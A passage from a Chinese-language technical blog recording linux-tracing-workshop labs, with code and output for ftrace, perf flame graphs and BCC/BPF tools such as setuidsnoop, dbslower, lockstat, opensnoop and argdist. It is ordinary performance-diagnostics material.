_fields_ = [
("pid", ct.c_ulonglong),
("uid", ct.c_uint),
("ret", ct.c_int),
("comm", ct.c_char * TASK_COMM_LEN)
]
</code></pre></div></div>
<p>第四步,在kprobe和kretprobe修改相应的数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kprobe__sys_kill(struct pt_regs *ctx, u32 uid)
{
u32 pid = bpf_get_current_pid_tgid();
FILTER
struct val_t val = {.pid = pid};
if (bpf_get_current_comm(&val.comm, sizeof(val.comm)) == 0) {
val.uid = uid;
infotmp.update(&pid, &val);
}
return 0;
};
int kretprobe__sys_kill(struct pt_regs *ctx)
{
struct data_t data = {};
struct val_t *valp;
u32 pid = bpf_get_current_pid_tgid();
valp = infotmp.lookup(&pid);
if (valp == 0) {
// missed entry
return 0;
}
bpf_probe_read(&data.comm, sizeof(data.comm), valp->comm);
data.pid = pid;
data.uid = valp->uid;
data.ret = PT_REGS_RC(ctx);
events.perf_submit(ctx, &data, sizeof(data));
infotmp.delete(&pid);
return 0;
}
</code></pre></div></div>
<p>第五步,修改print的数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("%-9s %-6s %-16s %-6s %s" % (
"TIME", "PID", "COMM", "UID", "RESULT"))
# process event
def print_event(cpu, data, size):
event = ct.cast(data, ct.POINTER(Data)).contents
if (args.failed and (event.ret >= 0)):
return
print("%-9s %-6d %-16s %-6d %d" % (strftime("%H:%M:%S"),
event.pid, event.comm.decode(), event.uid, event.ret))
</code></pre></div></div>
<p>效果</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./setuidsnoop.py
TIME PID COMM UID RESULT
11:41:05 36919 su 1000 0
11:45:01 36941 cron 0 0
</code></pre></div></div>
<p>原实验<a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/setuidsnoop.py">完整版</a></p>
<h2 id="9">9. Writing BPF Tools: dbslower </h2>
<p>该实验开发一个机遇USDT probe的BCC工具,用来监控数据库的query延迟和执行。</p>
<p>首先下载postgresql,使用–enable-dtraceb编译,使其支持USDT,运行:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ cd /usr/local/pgsql/bin
$ ./initdb -D /tmp/pgdata
$ ./pg_ctl -D /tmp/pgdata start
</code></pre></div></div>
<p>查看USDT probe点:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu1604:/usr/local/pgsql/bin$ /usr/share/bcc/tools/tplist -p $(pgrep -n postgres) | grep query
/usr/local/pgsql/bin/postgres postgresql:query__parse__start
/usr/local/pgsql/bin/postgres postgresql:query__parse__done
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__start
/usr/local/pgsql/bin/postgres postgresql:query__rewrite__done
/usr/local/pgsql/bin/postgres postgresql:query__plan__start
/usr/local/pgsql/bin/postgres postgresql:query__plan__done
/usr/local/pgsql/bin/postgres postgresql:query__start
/usr/local/pgsql/bin/postgres postgresql:query__done
/usr/local/pgsql/bin/postgres postgresql:query__execute__start
/usr/local/pgsql/bin/postgres postgresql:query__execute__done
</code></pre></div></div>
<p>本实验关注query__start 和 query__done,query__start第一个参数就是query参数。</p>
<p>下面根据实验给的整体框架完成工具编写。</p>
<p>第一步:找到PostgreSQL的进程ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dbpid = int(subprocess.check_output("pgrep -n postgres".split()))
</code></pre></div></div>
<p>第二步:定义数据结构,包含PID, timestamp, duration, 以及 query文本</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct temp_t {
u64 timestamp;
char *query;
};
struct data_t {
u64 pid;
u64 timestamp;
u64 duration;
char query[256];
};
BPF_HASH(temp, u64, struct temp_t);
BPF_PERF_OUTPUT(events);
</code></pre></div></div>
<p>第三步:第一两个函数处理query__start 和 query__end</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int probe_query_start(struct pt_regs *ctx) {
struct temp_t tmp = {};
tmp.timestamp = bpf_ktime_get_ns();
bpf_usdt_readarg(1, ctx, &tmp.query);
u64 pid = bpf_get_current_pid_tgid();
temp.update(&pid, &tmp);
return 0;
}
int probe_query_end(struct pt_regs *ctx) {
struct temp_t *tempp;
u64 pid = bpf_get_current_pid_tgid();
tempp = temp.lookup(&pid);
if (!tempp)
return 0;
u64 delta = bpf_ktime_get_ns() - tempp->timestamp;
if (delta >=""" + str(threshold_ns) + """) {
struct data_t data = {};
data.pid = pid >> 32;
data.timestamp = tempp->timestamp;
data.duration = delta;
bpf_probe_read(&data.query, sizeof(data.query), tempp->query);
events.perf_submit(ctx, &data, sizeof(data));
}
temp.delete(&pid);
return 0;
};
</code></pre></div></div>
<p>第四步:使用enable_probe enable query__start和query__end</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> usdt = USDT(pid=int(dbpid))
usdt.enable_probe("query__start", "probe_query_start")
usdt.enable_probe("query__done", "probe_query_end")
</code></pre></div></div>
<p>第五步:定义Python数据结构b表示输出</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> class Data(ct.Structure):
_fields_ = [
("pid", ct.c_ulonglong),
("timestamp", ct.c_ulonglong),
("delta", ct.c_ulonglong),
("query", ct.c_char * 256)
]
</code></pre></div></div>
<p>第六步:输出</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> start = 0
def print_event(cpu, data, size):
global start
event = ct.cast(data, ct.POINTER(Data)).contents
if start == 0:
start = event.timestamp
print("%-14.6f %-6d %8.3f %s" % (float(event.timestamp - start) / 1000000000,
event.pid, float(event.delta) / 1000000, event.query))
print("Tracing database queries for PID %d slower than %d ms..." %
(dbpid, args.threshold))
print("%-14s %-6s %8s %s" % ("TIME(s)", "PID", "MS", "QUERY"))
bpf["events"].open_perf_buffer(print_event)
</code></pre></div></div>
<p>效果:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./lqdbslower.py postgres 0
/virtual/main.c:45:15: warning: comparison of unsigned expression >= 0 is always true [-Wtautological-compare]
if (delta >=0) {
~~~~~ ^ ~
1 warning generated.
Tracing database queries for PID 50216 slower than 0 ms...
TIME(s) PID MS QUERY
0.000000 50216 1.806 INSERT INTO tbl(name, date) VALUES('aaa', '2013-12-22');
7.150496 50216 0.227 select * from tbl
</code></pre></div></div>
<p>原实验的<a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/dbslower.py">dbslower.py</a></p>
<h2 id="10"> 10. Writing BPF Tools: Contention Stats and Stacks </h2>
<p>该实验编写一个基于BCC的观察Linux锁的竞争状态的工具。</p>
<p>首先编译,运行程序:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# gcc -g -fno-omit-frame-pointer -pthread parprimes.c -o parprimes
root@ubuntu1604:~/linux-tracing-workshop# ./parprimes 4 10000
</code></pre></div></div>
<p>在<a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat.py">lockstat.py</a>查找TODO完成该工具。</p>
<p>// TODO Update tm_key fields with the mutex, tid, and stack id</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tm_key.tid = pid;
tm_key.mtx = entry->mtx;
tm_key.lock_stack_id = stack_id;
</code></pre></div></div>
<p>// TODO Call locks.lookup_or_init(…) and update the wait time and the enter count
// of the entry in the locks data structure</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct thread_mutex_val_t *existing_tm_val, new_tm_val = {};
existing_tm_val = locks.lookup_or_init(&tm_key, &new_tm_val);
existing_tm_val->wait_time_ns += wait_time;
if (PT_REGS_RC(ctx) == 0) {
existing_tm_val->enter_count += 1;
}
</code></pre></div></div>
<p>// TODO Update the mutex_lock_hist histogram with the time we held the lock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u64 slot = bpf_log2l(hold_time / 1000);
mutex_lock_hist.increment(slot);
</code></pre></div></div>
<p>// TODO Similarly to the previous probe, attach the following probes:
// uprobe in pthread_mutex_lock handled by probe_mutex_lock
// uretprobe in pthread_mutex_lock handled by probe_mutex_lock_return
// uprobe in pthread_mutex_unlock handled by probe_mutex_unlock</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bpf.attach_uprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock", pid=pid)
bpf.attach_uretprobe(name="pthread", sym="pthread_mutex_lock", fn_name="probe_mutex_lock_return", pid=pid)
bpf.attach_uprobe(name="pthread", sym="pthread_mutex_unlock", fn_name="probe_mutex_unlock", pid=pid)
</code></pre></div></div>
<p>// TODO Print a nicely formatted line with the mutex description, wait time,
// hold time, enter count, and stack (use print_stack)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> print("\tmutex %s ::: wait time %.2fus ::: hold time %.2fus ::: enter count %d" %
(mutex_descr, v.wait_time_ns/1000.0, v.lock_time_ns/1000.0, v.enter_count))
print_stack(bpf, pid, stacks, k.lock_stack_id)
</code></pre></div></div>
<p>效果:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# python lockstat.py $(pidof parprimes)
init stack for mutex 7fff3dfa1fa0 (#1)
[unknown] (7f2eebaa85a0)
[unknown] (7f2eeb6f5830)
[unknown] (113e258d4c544155)
thread 53243
mutex [unknown] ::: wait time 7.01us ::: hold time 5.56us ::: enter count 1
[unknown] (7f2eebcccb34)
[unknown] (7f2eeb70eff8)
[unknown] (7f2eeba9b060)
thread 53246
mutex #1 ::: wait time 1655.31us ::: hold time 809.63us ::: enter count 369
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53247
mutex #1 ::: wait time 12850.63us ::: hold time 660.04us ::: enter count 302
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53248
mutex #1 ::: wait time 13290.15us ::: hold time 610.43us ::: enter count 281
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
thread 53249
mutex #1 ::: wait time 1282.58us ::: hold time 621.87us ::: enter count 279
[unknown] (4009f0)
[unknown] (400a44)
[unknown] (7f2eebaa66ba)
wait time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 1229 |****************************************|
8 -> 15 : 1 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 0 | |
1024 -> 2047 : 0 | |
2048 -> 4095 : 0 | |
4096 -> 8191 : 0 | |
8192 -> 16383 : 2 | |
hold time (us) : count distribution
0 -> 1 : 0 | |
2 -> 3 : 1227 |****************************************|
4 -> 7 : 4 | |
8 -> 15 : 1 | |
</code></pre></div></div>
<p>原实验解答<a href="https://github.com/goldshtn/linux-tracing-workshop/blob/master/lockstat-solution.py">lockstat-solution</a></p>
linux-tracing-workshop-part 12017-12-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/05/tracing1
<p>记录<a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a>实验过程,第一部分共七篇。</p>
<ul>
<li><a href="#1">1. Probing Tracepoints with ftrace</a></li>
<li><a href="#2">2. CPU Sampling with perf and Flame Graphs</a></li>
<li><a href="#3">3. Using BPF Tools: Broken File Opens</a></li>
<li><a href="#4">4. Using BPF Tools: Slow File I/O</a></li>
<li><a href="#5">5. Using BPF Tools: Chasing a Memory Leak</a></li>
<li><a href="#6">6. Using BPF Tools: Database and Disk Stats and Stacks</a></li>
<li><a href="#7">7. Using BPF Tools: Node and JVM USDT Probes</a></li>
</ul>
<h2 id="1">1. Probing Tracepoints with ftrace</h2>
<h3>开启sched:sched_switch tracepoint进行线程切换跟踪</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# cd /sys/kernel/debug/tracing/
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > tracing_on
root@ubuntu1604:/sys/kernel/debug/tracing# cat events/sched/sched_switch/format
name: sched_switch
ID: 273
format:
field:unsigned short common_type; offset:0; size:2; signed:0;
field:unsigned char common_flags; offset:2; size:1; signed:0;
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
field:int common_pid; offset:4; size:4; signed:1;
field:char prev_comm[16]; offset:8; size:16; signed:1;
field:pid_t prev_pid; offset:24; size:4; signed:1;
field:int prev_prio; offset:28; size:4; signed:1;
field:long prev_state; offset:32; size:8; signed:1;
field:char next_comm[16]; offset:40; size:16; signed:1;
field:pid_t next_pid; offset:56; size:4; signed:1;
field:int next_prio; offset:60; size:4; signed:1;
print fmt: "prev_comm=%s prev_pid=%d prev_prio=%d prev_state=%s%s ==> next_comm=%s next_pid=%d next_prio=%d", REC->prev_comm, REC->prev_pid, REC->prev_prio, REC->prev_state & (2048-1) ? __print_flags(REC->prev_state & (2048-1), "|", { 1, "S"} , { 2, "D" }, { 4, "T" }, { 8, "t" }, { 16, "Z" }, { 32, "X" }, { 64, "x" }, { 128, "K" }, { 256, "W" }, { 512, "P" }, { 1024, "N" }) : "R", REC->prev_state & 2048 ? "+" : "", REC->next_comm, REC->next_pid, REC->next_prio
root@ubuntu1604:/sys/kernel/debug/tracing# echo 1 > events/sched/sched_switch/enable
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 703/703 #P:1
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
bash-817 [000] d... 371.932169: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=R ==> next_comm=kworker/u128:3 next_pid=80 next_prio=120
kworker/u128:3-80 [000] d... 371.932187: sched_switch: prev_comm=kworker/u128:3 prev_pid=80 prev_prio=120 prev_state=S ==> next_comm=sshd next_pid=790 next_prio=120
sshd-790 [000] d... 371.932226: sched_switch: prev_comm=sshd prev_pid=790 prev_prio=120 prev_state=S ==> next_comm=bash next_pid=817 next_prio=120
bash-817 [000] d... 371.932236: sched_switch: prev_comm=bash prev_pid=817 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.935521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.935525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.939514: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.939517: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.943513: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.943516: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.947521: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.947525: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.951522: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.951527: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.955518: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.955522: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.959515: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
rcu_sched-7 [000] d... 371.959518: sched_switch: prev_comm=rcu_sched prev_pid=7 prev_prio=120 prev_state=S ==> next_comm=swapper/0 next_pid=0 next_prio=120
<idle>-0 [000] d... 371.963516: sched_switch: prev_comm=swapper/0 prev_pid=0 prev_prio=120 prev_state=R ==> next_comm=rcu_sched next_pid=7 next_prio=120
echo 0 > events/sched/sched_switch/enable
</code></pre></div></div>
<h3>开启function tracer</h3>
<p>函数调用</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
qemu-ga-449 [000] .... 591.951939: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.951965: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952138: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952222: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.952247: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957259: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957331: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957356: vfs_write <-SyS_write
qemu-ga-449 [000] .... 591.957516: vfs_write <-SyS_write
rs:main Q:Reg-425 [000] .... 591.957797: vfs_write <-SyS_write
</code></pre></div></div>
<p>查看具体的函数路径</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/sys/kernel/debug/tracing# echo function_graph > current_tracer
root@ubuntu1604:/sys/kernel/debug/tracing# echo > set_ftrace_filter
root@ubuntu1604:/sys/kernel/debug/tracing# echo vfs_write > set_graph_function
root@ubuntu1604:/sys/kernel/debug/tracing# cat trace
0) sshd-902 => rs:main-425
------------------------------------------
0) | vfs_write() {
0) | rw_verify_area() {
0) | security_file_permission() {
0) | apparmor_file_permission() {
0) | common_file_perm() {
0) 0.137 us | aa_file_perm();
0) 0.959 us | }
0) 1.468 us | }
0) 2.035 us | }
0) 2.605 us | }
</code></pre></div></div>
<p>指定函数深度</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 2 > max_graph_depth
</code></pre></div></div>
<p>关闭</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # echo nop > current_tracer
# echo > set_graph_function
</code></pre></div></div>
<h2 id="2">2. CPU Sampling with perf and Flame Graphs</h2>
<h3>普通程序</h3>
<p>编译程序:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -fopenmp primes.c -o primes
root@ubuntu1604:~/linux-tracing-workshop# export OMP_NUM_THREADS=16
root@ubuntu1604:~/linux-tracing-workshop# perf record -g -F 997 -- ./primes
</code></pre></div></div>
<p>-g表示capture stack,-F表示采用频率,会在当前目录生成perf.data。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# perf report --stdio
# To display the perf.data header info, please use --header/--header-only options.
#
#
# Total Lost Samples: 0
#
# Samples: 7K of event 'cpu-clock'
# Event count (approx.): 7265797196
#
# Children Self Command Shared Object Symbol
# ........ ........ ....... ................. ...............................
#
99.99% 0.00% primes primes [.] main._omp_fn.0
|
---main._omp_fn.0
|
|--99.97%-- is_prime
| |
| |--85.01%-- is_divisible
| | |
| | |--0.08%-- retint_user
| | | prepare_exit_to_usermode
| | | exit_to_usermode_loop
</code></pre></div></div>
<p>可以看到is_divisible花费时间很多,perf annotate可以看到更详细的情况。</p>
<p>root@ubuntu1604:~/linux-tracing-workshop# perf annotate</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> is_divisible /root/linux-tracing-workshop/primes
│
│ int is_divisible(int n, int d)
│ {
0.02 │ push %rbp
│ mov %rsp,%rbp
5.98 │ mov %edi,-0x4(%rbp)
│ mov %esi,-0x8(%rbp)
│ return n % d == 0;
│ mov -0x4(%rbp),%eax
3.51 │ cltd
2.75 │ idivl -0x8(%rbp)
71.34 │ mov %edx,%eax
│ test %eax,%eax
5.51 │ sete %al
5.82 │ movzbl %al,%eax
│ }
5.07 │ pop %rbp
│ ← retq
</code></pre></div></div>
<p>查看火焰图:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # perf script > primes.stacks
# FlameGraph/stackcollapse-perf.pl primes.stacks > primes.collapsed
# FlameGraph/flamegraph.pl primes.collapsed > primes.svg
</code></pre></div></div>
<p>从火焰图上可以看出确实是is_divisible这个函数用时多。</p>
<p><img src="/assets/img/tracing1/2.png" alt="" /></p>
<h3>Java程序</h3>
<p>下载安装 <a href="https://github.com/jvm-profiling-tools/perf-map-agent.git">perf_map_agent</a></p>
<p>启动示例,先不要按Enter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# java -XX:+PreserveFramePointer -XX:-Inline slowy/App
Press ENTER to start.
</code></pre></div></div>
<p>另一个终端:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# jps
20274 App
20285 Jps
root@ubuntu1604:~/perf-map-agent/bin# ./perf-java-report-stack 20274
</code></pre></div></div>
<p>接着在第一个终端开始,第二个终端可以看到数据,可以看到是isDivisible花了时间:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Samples: 1K of event 'cpu-clock', Event count (approx.): 11969696850
Children Self Command Shared Object Symbol
+ 100.00% 0.00% java perf-20274.map [.] call_stub
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982d987b
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fb52e
+ 100.00% 0.00% java libjvm.so [.] 0xffff801f982fde5f
+ 100.00% 0.00% java libjli.so [.] 0xffff801f96337552
+ 100.00% 0.00% java libjli.so [.] 0xffff801f9633b3dd
+ 100.00% 0.00% java libpthread-2.23.so [.] start_thread
+ 89.79% 10.63% java perf-20274.map [.] Lslowy/App;::isPrime
+ 89.20% 89.03% java perf-20274.map [.] Lslowy/App;::isDivisible
+ 72.07% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 17.13% 0.00% java perf-20274.map [.] Lslowy/App;::main
+ 10.80% 0.08% java perf-20274.map [.] Interpreter
+ 0.08% 0.00% java libjvm.so [.] 0xffff801f97f82ab0
+ 0.08% 0.00% java [kernel.kallsyms] [k] schedule
</code></pre></div></div>
<p>生成火焰图:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# cd /tmp/
root@ubuntu1604:/tmp# ls
hsperfdata_root java.svg perf-18877.data.old perf-20210.data perf-20210.map perf-20274.data perf-20274.map perf.data perf-vdso.so-4k55kH perf-vdso.so-HGHJGC
root@ubuntu1604:/tmp# mv perf-20274.data perf.data
root@ubuntu1604:/tmp# perf script | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl --colors=java > java.svg
</code></pre></div></div>
<p><img src="/assets/img/tracing1/2.1.png" alt="" /></p>
<h3>Node程序</h3>
<p>Node程序需要带–perf_basic_prof启动。进入nodey启动run.sh</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ./run.sh perf
</code></pre></div></div>
<p>另一个终端开启perf</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf record -F 97 -p $(pgrep -n node) -g
</code></pre></div></div>
<p>第一个终端开始测试</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop/nodey# ab -c 10 -n 100 -m POST 'http://localhost:3000/users/auth?username=foo&password=wrong'
</code></pre></div></div>
<p>终止可以查看数据</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-map-agent/bin# perf report -i perf.data
</code></pre></div></div>
<p>当然,也可以生成火焰图</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu1604:~/perf-map-agent/bin# perf script -i perf.data | ~/FlameGraph/stackcollapse-perf.pl | ~/FlameGraph/flamegraph.pl > node.svg
</code></pre></div></div>
<h2 id="3"> 3. Using BPF Tools: Broken File Opens </h2>
<p>这个实验会使用BCC Tool对程序启动过程的错误进行排查。</p>
<p>首先,编译有问题的程序:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> gcc -g -fno-omit-frame-pointer -O0 server.c -o server
</code></pre></div></div>
<p>运行server,虽然现实启动成功,但是它并没有初始化成功。看起来程序是卡住了, 使用top可以发现server的cpu消耗还是挺多的.
查看server程序用户态和内核态的cpu利用率:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# pidstat -u -p $(pidof server) 1
Linux 4.4.0-21-generic (ubuntu1604) 12/04/2017 _x86_64_ (1 CPU)
12:46:39 PM UID PID %usr %system %guest %CPU CPU Command
12:46:40 PM 0 29947 1.15 11.49 0.00 12.64 0 server
12:46:41 PM 0 29947 1.18 11.76 0.00 12.94 0 server
12:46:42 PM 0 29947 5.62 6.74 0.00 12.36 0 server
12:46:43 PM 0 29947 2.30 10.34 0.00 12.64 0 server
12:46:44 PM 0 29947 1.11 11.11 0.00 12.22 0 server
12:46:45 PM 0 29947 2.27 9.09 0.00 11.36 0 server
q12:46:46 PM 0 29947 3.53 10.59 0.00 14.12 0 server
12:46:47 PM 0 29947 1.16 11.63 0.00 12.79 0 server
</code></pre></div></div>
<p>可以看到,server在内核态的时候比较多。使用syscount查看,可以看到,server调用nanosleep和open这两个syscall比较频繁。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/perf-tools/bin# ./syscount -cp $(pidof server)
Tracing PID 29947... Ctrl-C to end.
^CSYSCALL COUNT
nanosleep 202027
open 202054
root@ubuntu1604:~/perf-tools/bin#
</code></pre></div></div>
<p>opensnoop可以查看进程issue的open请求:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~# opensnoop -p $(pidof server) -d 0.01
Tracing open()s issued by PID 910 for 0.01 seconds (buffered)...
COMM PID FD FILE
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
server 910 -1 /etc/tracing-server-example.conf
</code></pre></div></div>
<p>这样问题的基本原因就大概清楚了,server试图访问/etc/tracing-server-example.conf文件,但是该文件并不存在,所以没有初始化成功。</p>
<p>我们也可以用argdist来查看函数或者系统调用的参数。比如我们查看nanosleep的参数,可以发现大多数都是在512~1023之间,server中的nanosleep是1000。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -H 'p::SyS_nanosleep(struct timespec *time):u64:time->tv_nsec'
[14:09:10]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15864 |****************************************|
[14:09:11]
time->tv_nsec : count distribution
0 -> 1 : 0 | |
2 -> 3 : 0 | |
4 -> 7 : 0 | |
8 -> 15 : 0 | |
16 -> 31 : 0 | |
32 -> 63 : 0 | |
64 -> 127 : 0 | |
128 -> 255 : 0 | |
256 -> 511 : 0 | |
512 -> 1023 : 15890 |****************************************|
[14:09:12]
</code></pre></div></div>
<p>类似的,我们查看open的参数和返回值</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/bcc/tools# ./argdist.py -p $(pidof server) -C 'p:c:open(char *filename):char*:filename'
[14:13:04]
p:c:open(char *filename):char*:filename
COUNT EVENT
14626 filename = /etc/tracing-server-example.conf
[14:13:05]
p:c:open(char *filename):char*:filename
COUNT EVENT
14606 filename = /etc/tracing-server-example.conf
[14:13:06]
p:c:open(char *filename):char*:filename
COUNT EVENT
14482 filename = /etc/tracing-server-example.conf
[14:13:07]
p:c:open(char *filename):char*:filename
